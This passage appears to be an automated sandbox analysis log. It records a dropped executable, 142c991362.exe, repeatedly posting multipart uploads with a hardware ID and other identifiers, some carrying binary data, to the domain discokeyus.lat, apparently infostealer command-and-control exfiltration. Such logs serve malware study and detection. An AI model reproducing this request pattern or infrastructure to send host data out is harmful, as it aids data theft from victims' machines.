                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1369INData Raw: 32 63 35 64 0d 0a 36 72 75 61 34 4b 4c 59 72 4b 48 66 4a 59 43 6d 75 6e 77 56 78 67 72 4e 31 57 30 7a 52 51 42 77 41 70 56 46 70 64 31 64 42 71 46 54 62 70 2b 42 39 39 6d 70 45 56 6f 42 6a 5a 4c 37 49 54 47 2f 5a 38 47 6b 56 45 34 64 48 55 56 4b 34 46 7a 4a 59 46 45 37 57 56 62 4c 39 39 54 75 35 4f 30 39 72 69 58 64 75 72 73 34 51 42 4e 62 2b 59 51 77 46 30 55 6c 66 46 50 63 50 4f 69 38 55 41 6f 63 71 70 4f 32 2f 49 4c 51 6f 4c 54 6a 56 5a 69 65 68 6e 30 74 6a 6c 4b 45 70 57 77 62 52 58 31 39 56 74 45 56 34 5a 31 63 51 6c 53 33 43 67 38 4e 38 35 33 35 39 65 4d 56 58 59 71 7a 59 48 57 32 4d 2f 43 64 44 4c 64 46 50 58 79 33 35 46 33 49 68 44 45 61 6a 61 66 4b 7a 36 6d 33 77 4e 6c 52 76 67 58 78 75 71 4a 31 7a 4b 4e 6a 30 4a 31 56 55 6c 30 64 48 51 76 6b 58
                                                                                                                                                                                                                                                              Data Ascii: 2c5d6rua4KLYrKHfJYCmunwVxgrN1W0zRQBwApVFpd1dBqFTbp+B99mpEVoBjZL7ITG/Z8GkVE4dHUVK4FzJYFE7WVbL99Tu5O09riXdurs4QBNb+YQwF0UlfFPcPOi8UAocqpO2/ILQoLTjVZiehn0tjlKEpWwbRX19VtEV4Z1cQlS3Cg8N85359eMVXYqzYHW2M/CdDLdFPXy35F3IhDEajafKz6m3wNlRvgXxuqJ1zKNj0J1VUl0dHQvkX
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1369INData Raw: 57 41 61 62 75 44 30 31 7a 76 66 48 74 2b 6c 32 35 6d 39 2f 46 72 41 76 4c 4e 63 68 67 61 6e 77 41 4a 41 2f 63 5a 4b 6d 34 55 58 71 38 71 74 50 33 53 4e 61 46 6a 4f 6a 44 48 54 47 71 32 30 56 6f 31 33 62 35 41 46 52 4f 51 45 51 38 46 75 42 68 45 56 33 56 47 32 43 72 36 2f 62 55 70 72 7a 74 2b 65 63 63 68 4f 65 71 45 43 48 43 62 6f 7a 55 45 57 6f 68 48 43 56 4c 76 42 53 51 68 52 6b 62 4f 4b 72 75 2b 2f 32 6e 6e 65 47 78 72 77 45 64 58 6e 39 46 61 49 74 72 6a 61 68 63 31 6b 68 59 56 4c 49 6c 43 61 57 39 61 41 59 42 37 76 50 4f 74 64 4b 45 6a 51 79 6a 50 4f 56 62 32 6e 30 56 6a 6c 4c 4e 53 47 42 71 66 41 41 6b 44 2b 6e 42 6b 5a 6c 55 51 68 6d 66 77 6e 4f 35 71 36 7a 73 30 4b 49 45 35 4d 65 71 52 48 53 66 64 73 7a 39 4c 52 73 70 53 54 45 58 6e 42 58 55 76 54
                                                                                                                                                                                                                                                              Data Ascii: WAabuD01zvfHt+l25m9/FrAvLNchganwAJA/cZKm4UXq8qtP3SNaFjOjDHTGq20Vo13b5AFROQEQ8FuBhEV3VG2Cr6/bUprzt+ecchOeqECHCbozUEWohHCVLvBSQhRkbOKru+/2nneGxrwEdXn9FaItrjahc1khYVLIlCaW9aAYB7vPOtdKEjQyjPOVb2n0VjlLNSGBqfAAkD+nBkZlUQhmfwnO5q6zs0KIE5MeqRHSfdsz9LRspSTEXnBXUvT


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              30192.168.2.450134104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:15 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=YZJVI288ZGJE
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8748
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:15 UTC8748OUTData Raw: 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: --YZJVI288ZGJEContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--YZJVI288ZGJEContent-Disposition: form-data; name="pid"2--YZJVI288ZGJEContent-Disposition: form-data; name="lid"PsFKDg--pablo--YZJVI288ZGJE
                                                                                                                                                                                                                                                              2024-12-22 01:18:16 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:16 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=fqapfk576bh310lfao02nh6i5a; expires=Wed, 16 Apr 2025 19:04:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BYLQGnn%2F8wBfGru1RSJSXAKvyy6ZP84cKlPCWm%2FphgC8Swtk1nSxqgHXIl7BG3Ejy1DJc5yDX6tZ%2FC2qx5eDzm%2FnH39rEm%2FhjRrDTh4zkY5IGCeAEtrl7DTG9c05149IA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c46e62f06c330-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1503&rtt_var=584&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9679&delivery_rate=1841109&cwnd=235&unsent_bytes=0&cid=0c2205bf5d2a3bd2&ts=790&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              31192.168.2.450140104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:19 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ZXU50Q0QI7
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20389
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:19 UTC15331OUTData Raw: 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                              Data Ascii: --ZXU50Q0QI7Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--ZXU50Q0QI7Content-Disposition: form-data; name="pid"3--ZXU50Q0QI7Content-Disposition: form-data; name="lid"PsFKDg--pablo--ZXU50Q0QI7Content-
                                                                                                                                                                                                                                                              2024-12-22 01:18:19 UTC5058OUTData Raw: 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@dR<
                                                                                                                                                                                                                                                              2024-12-22 01:18:20 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:20 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ptukeub9j83d0mlgueamgicvtq; expires=Wed, 16 Apr 2025 19:04:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANdmARMsAnFKfrIRNZCPHigTCq9ngazWp3GG7%2B%2B2mU6ysCFErjWbYWCr7hHX8z97vEBGijuSdGSgQOPDBXWZuGdgGGrDWuwBAR4nVOK1MxkeQUCHf7edZRLR2zw%2F5K106Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c46fbcbe25e64-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1920&rtt_var=730&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21341&delivery_rate=1487519&cwnd=246&unsent_bytes=0&cid=fafae0dc4432a248&ts=1160&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              32192.168.2.450141104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:20 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=WYVFVGRE6KP60HEI0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 13250
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:20 UTC13250OUTData Raw: 2d 2d 57 59 56 46 56 47 52 45 36 4b 50 36 30 48 45 49 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 59 56 46 56 47 52 45 36 4b 50 36 30 48 45 49 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 59 56 46 56 47 52 45 36 4b 50 36 30 48 45 49 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                              Data Ascii: --WYVFVGRE6KP60HEI0Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--WYVFVGRE6KP60HEI0Content-Disposition: form-data; name="pid"2--WYVFVGRE6KP60HEI0Content-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                              2024-12-22 01:18:21 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:21 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=vl2lgd5huj99rbva4gdjidrgb3; expires=Wed, 16 Apr 2025 19:05:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJqUe%2FFUK7vq41JnpIKAJ%2FXdjE1az6V8OiuE1dn4ibCPTQCLhsTXZ6swOw1rG9GggTIRfMzQuxts2uckY5RYQ%2FWu1VCNa0wSwaLd%2BCvFT8MX90icszgeNqSvKm1Vg2Q1GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c470579e442b1-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1581&rtt_var=600&sent=11&recv=17&lost=0&retrans=0&sent_bytes=2832&recv_bytes=14187&delivery_rate=1813664&cwnd=211&unsent_bytes=0&cid=7a937e2d4353efe8&ts=807&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              33192.168.2.450157104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:26 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=51HCO1EC
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8724
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:26 UTC8724OUTData Raw: 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                              Data Ascii: --51HCO1ECContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--51HCO1ECContent-Disposition: form-data; name="pid"2--51HCO1ECContent-Disposition: form-data; name="lid"PsFKDg--pablo--51HCO1ECContent-Disposit
                                                                                                                                                                                                                                                              2024-12-22 01:18:27 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=69ol5iackqibi0n7kh0rnk5m62; expires=Wed, 16 Apr 2025 19:05:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sT9%2BYKuFjKownD1Pk2vciCt71nt4dm2%2FMhUxE0wmM%2BbgzoceJgL3yZdZNiMX3jmZUhmqRwXrCIevyClr92WNWXeHZSSo4JL2DXE8vS%2B%2BKPH2n7dCv2if0%2F8dElLy9UgC1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4729fc5c0fa3-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1627&rtt_var=660&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9651&delivery_rate=1596500&cwnd=222&unsent_bytes=0&cid=c7804548fa23a5af&ts=819&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              34192.168.2.450158104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:27 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=76RK6BD5CHRQW
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:27 UTC1356OUTData Raw: 2d 2d 37 36 52 4b 36 42 44 35 43 48 52 51 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 36 52 4b 36 42 44 35 43 48 52 51 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 36 52 4b 36 42 44 35 43 48 52 51 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 37 36 52 4b 36 42 44 35 43 48 52
                                                                                                                                                                                                                                                              Data Ascii: --76RK6BD5CHRQWContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--76RK6BD5CHRQWContent-Disposition: form-data; name="pid"1--76RK6BD5CHRQWContent-Disposition: form-data; name="lid"PsFKDg--pablo--76RK6BD5CHR
                                                                                                                                                                                                                                                              2024-12-22 01:18:28 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=7jvvtp55snjmk2f03574gl00e1; expires=Wed, 16 Apr 2025 19:05:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3F18nBn15e0radx7ud1IzVCvTN%2Fy8UWLrLnRWgW2SpoJuUaJReS01cz600xUt7oQCUEBY%2BIkaar9qdi4ek0kO4rbrWuq5MlCeEzIEVe0LGteDNUk8UEPtAHZw6flC2aDsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c472e0c6919cf-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2065&min_rtt=1869&rtt_var=841&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2266&delivery_rate=1562332&cwnd=252&unsent_bytes=0&cid=e992bb7a1811c796&ts=783&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              35192.168.2.450162104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:31 UTC275OUTPOST /api HTTP/1.1
